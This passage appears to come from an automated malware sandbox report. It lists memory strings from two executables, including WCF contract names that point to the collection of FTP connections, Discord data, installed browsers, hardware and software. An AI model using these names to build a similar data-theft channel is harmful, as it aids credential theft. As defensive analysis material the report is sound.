0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDiscordResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionDiscordResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionFtpConnections
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionFtpConnectionsLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionFtpConnectionsResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionFtpConnectionsResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionHardwares
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionHardwaresLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionHardwaresResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionHardwaresResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledBrowsers
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledBrowsersLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledBrowsersResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledBrowsersResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledSoftwares
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledSoftwaresLR
